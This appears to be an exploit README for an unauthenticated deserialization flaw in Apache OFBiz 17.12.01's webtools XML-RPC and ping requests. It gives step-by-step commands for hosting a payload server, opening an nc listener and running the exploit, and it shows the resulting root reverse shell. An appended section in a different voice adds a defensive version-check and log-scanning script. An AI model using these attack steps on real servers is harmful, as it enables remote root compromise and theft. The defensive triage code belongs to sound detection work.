
Because the two XML-RPC related requests in webtools (xmlrpc and ping) do not use authentication, they are vulnerable to unsafe deserialization.
This issue was reported to the security team by Alvaro Munoz from the GitHub Security Lab team.

Affected Version 17.12.01

Fixed Versions 18.12.01, 17.12.04

Original Blog:
Apache's Post:
Github's POC:

To make this exploit work, take the following steps:

Step 1: Host an HTTP service with python3

> sudo python3 -m http.server 80

Step 2: Run an nc listener on the desired port (8001 recommended)

> nc -nlvp 8001

Step 3: Change the website's URL and port inside the script:

url='' # CHANGE THIS
port=8443 # CHANGE THIS

Step 4: Run the exploit as shown below

> ./ -i IP -p PORT

Step 5: Check the nc listener

❯ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
uid=0(root) gid=0(root) groups=0(root)
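As an added defender-side example (not part of this PoC or of OFBiz itself), the script below triages an OFBiz version against the affected and fixed versions listed above and flags access-log requests that reached the unauthenticated webtools xmlrpc and ping requests; the /webtools/control/ path prefix, the log format and the sample log lines are assumptions constructed for the example.

```python
import re
from typing import List, Tuple

# Versions taken from the advisory text above: 17.12.01 is affected,
# 17.12.04 and 18.12.01 carry the fix.
FIXED_VERSIONS = {(17, 12, 4), (18, 12, 1)}

# Assumption: the unauthenticated XML-RPC and ping requests in webtools are
# served under these paths (the page names the requests, not the full paths).
WATCHED_PATHS = ("/webtools/control/xmlrpc", "/webtools/control/ping")

# Constructed sample lines in a common-log-style format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2021:10:00:01 +0000] "POST /webtools/control/xmlrpc HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2021:10:00:02 +0000] "GET /webtools/control/main HTTP/1.1" 200 8192
203.0.113.5 - - [01/Jan/2021:10:00:03 +0000] "GET /webtools/control/ping HTTP/1.1" 200 64
192.0.2.9 - - [01/Jan/2021:10:00:04 +0000] "POST /accounting/control/main HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn '17.12.01' into (17, 12, 1) so versions compare numerically."""
    major, minor, patch = (int(p) for p in version.split("."))
    return major, minor, patch

def is_affected(version: str) -> bool:
    """True if the version is below the fixed release of its major line.
    Lines with no fix listed on the page are refused rather than guessed."""
    v = parse_version(version)
    fixed_for_line = [f for f in FIXED_VERSIONS if f[0] == v[0]]
    if not fixed_for_line:
        raise ValueError(f"no fix information for release line {v[0]}.x")
    return v < min(fixed_for_line)

def find_xmlrpc_hits(log_text: str) -> List[dict]:
    """Return one record per request that reached a watched endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        path = m.group("path").split("?", 1)[0]  # ignore any query string
        if path in WATCHED_PATHS:
            hits.append({k: m.group(k) for k in ("src", "ts", "method", "path", "status")})
    return hits

if __name__ == "__main__":
    print("17.12.01 affected:", is_affected("17.12.01"))
    for hit in find_xmlrpc_hits(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} {hit['method']} {hit['path']} -> {hit['status']}")
```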